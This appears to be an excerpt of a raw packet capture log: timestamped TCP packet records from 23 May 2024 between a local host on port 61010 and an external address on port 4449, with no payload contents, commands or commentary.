May 23, 2024 15:34:11.798516989 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.798527956 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.798571110 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.800525904 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.800535917 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.800584078 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.802531958 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.802541971 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.802588940 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.804503918 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.804513931 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.804522038 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.804567099 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.806535006 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.806545019 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.806575060 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.808501005 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.808511019 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.808552027 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.810420036 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.810431004 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.810461044 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.812011957 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.812024117 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.812033892 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.812055111 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.812084913 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.813770056 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.813781977 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.813823938 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.815404892 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.815417051 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.815469027 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.816929102 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.816940069 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.816988945 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.820328951 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.820341110 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.820350885 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.820362091 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.820372105 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.820393085 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.820445061 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.821739912 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.821751118 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.821785927 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.822315931 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.822326899 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.822369099 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.822839975 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.822850943 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.822909117 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.824722052 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.824733019 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.824775934 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.829615116 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.829626083 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.829634905 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.829672098 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.830630064 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.830681086 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.830732107 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.832333088 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.832462072 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.832506895 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.833965063 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.833997965 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.834043980 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.835283041 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.835316896 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.835347891 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.835355997 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.835381031 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.835412979 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.835419893 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.836654902 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.836688042 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.836702108 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.838305950 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.838340044 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.838363886 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.839910984 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.839946032 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.839958906 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.846431017 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.846465111 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.846507072 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.848051071 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.848083973 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.848109961 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.849678040 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.849710941 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.849741936 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.849771023 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.849800110 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.851303101 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.851336002 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.851392984 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.852962017 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.852994919 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.853106022 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.854545116 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.854578018 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.854661942 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.856168985 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.856201887 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.857561111 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.857806921 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.857839108 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.857870102 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.857893944 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.859426975 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.859461069 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.859483957 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.860724926 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.860758066 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.860783100 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.862061024 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.862093925 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.862119913 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.863349915 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.863398075 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.863429070 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.863429070 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.863481998 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.866024971 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.866064072 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.866112947 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.867270947 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.867305994 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.867348909 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.868554115 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.868587971 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.868714094 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.869918108 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.869954109 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.870161057 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.871077061 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.871109009 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.871140957 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.871196032 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.872268915 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.874547005 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.874560118 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.874581099 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.874605894 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.874641895 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.875631094 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.875642061 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.875673056 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.876795053 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.876806021 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.876832962 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.877881050 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.877892017 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.877922058 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.879023075 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.879086018 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.880175114 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.881279945 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.881289959 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.881297112 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.881324053 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.881352901 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.882443905 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.882455111 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.882503033 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.883534908 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.883546114 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.883579016 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.884613991 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.884624004 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.884671926 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.885695934 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.885705948 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.885744095 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.886655092 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.886665106 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.886673927 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.886698961 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.887609005 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.887619019 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.887692928 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.888586044 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.888605118 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.888631105 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.889472961 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.889498949 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.889524937 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.890434027 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.890444994 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.890494108 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.891325951 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.891343117 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.891381979 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.892237902 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.892249107 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.892257929 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.892280102 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.892306089 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.893266916 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.893277884 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.893337965 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.894098043 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.894108057 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.894176006 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.895570040 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.895581007 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.895632029 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.897110939 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.897121906 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.897166014 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.898627043 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.898638010 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.898647070 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.898703098 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.900154114 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.900171041 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.900204897 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.901294947 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.901305914 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.901315928 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.901344061 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.901384115 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.902410030 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.902420998 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.902471066 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.903412104 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.903423071 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.903456926 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.904419899 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.904431105 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.904438972 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.904484034 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.905431032 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.905441046 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.905498028 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.906337023 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.906352043 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.906388998 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.907316923 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.907329082 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.907365084 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.908299923 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.908310890 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.908364058 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.909246922 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.909260988 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.909270048 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.909291029 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.909317017 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.910221100 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.910232067 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.910274982 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.911207914 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.911218882 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.911262989 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.912146091 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.912157059 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.912221909 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.913114071 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.913125038 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.913170099 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.914071083 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.914083004 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.914092064 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.914129972 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.915081978 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.915092945 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.915132046 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.916009903 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.916021109 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.916053057 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.917001009 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.917011976 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.917038918 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.918055058 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.918065071 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.918118954 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.918920040 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.918930054 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.918939114 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.918971062 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.918998003 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.919892073 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.919903040 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.919945002 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.920794010 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.920814037 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.920864105 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.921819925 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.921830893 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.921864033 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.922781944 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.922791958 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.922801018 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.922837019 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.923748016 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.923758984 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.923800945 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.924695015 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.924705982 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.924746037 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.925672054 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.925682068 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.925720930 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.926645994 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.926656961 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.926697016 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.927606106 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.927617073 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.927624941 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.927659035 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.928580999 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.928592920 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.928631067 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.929358006 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.929368019 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.929419041 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.930113077 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.930123091 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.930166006 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.930881977 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.930891991 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.930902004 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.930944920 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.931675911 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.931687117 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.931725025 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.932442904 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.932454109 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.932492018 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.933217049 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.933227062 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.933267117 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.934040070 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.934051037 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.934092999 CEST	61010	4449	192.168.2.5	66.235.168.242
May 23, 2024 15:34:11.934768915 CEST	4449	61010	66.235.168.242	192.168.2.5
May 23, 2024 15:34:11.934781075 CEST	4449	61010	66.235.168.242	192.168.2.5
